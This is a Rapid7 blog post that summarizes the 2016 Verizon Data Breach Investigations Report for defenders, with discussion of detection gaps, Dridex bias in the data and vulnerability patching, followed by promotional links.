Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that Jen Ellis might need prescription lenses) will be speaking at SOURCE Boston this week talking about "doing data science" at "internet scale" and also on how you can get started doing security data science at home or in your organization.  So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away and to find out what information lies hidden in this seemingly innocuous square:

The 2016 Verizon Data Breach Investigations Report (DBIR) Summary - The Defender's Perspective

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers have, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into…

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers have, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000 incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been. The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map. Bigger is…Better? There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches: We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns: We can also take another, discrete view of this by industry: As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident to breach ratio (you are using VERIS to record and track everything from anti-virus hits to full on breaches, right?) and compare it to the corresponding industry/size. The Single Most Popular Valuable Chart In The World! (for defenders) When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing: We smoothed out the rough edges from the 2016 Verizon Data Breach Report to figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap: Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!" So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on: Some key takeaways: Malware and hacking events dropping C2s are up Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year) Malware-based exfiltration is back to previously seen levels Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up) Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data. Not all Cut-and-Dridex The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve: Phishing Endpoint malware drops Establishment of command and control (C2) on the endpoint Harvesting credentials and shipping them back to the C2 servers This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category: "Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions." So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another. Who has your back? When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well: In the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions. Are you: Identifying critical assets and access points? Monitoring the right things (or anything) on your endpoints? Getting the right logs into the right places for analysis and action? Deploying honeypots to catch activity that should not be happening? If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is an battle of economics). Are You Feeling Vulnerable? Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well: We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand? Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan) Develop a strategy patching with a holistic focus, not just react to "Patch Tuesday" Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise. "Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM. There and Back Again This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization. (Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.) Related Resources: Watch my short take on this year's Verizon Data Breach Investigations Report. Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now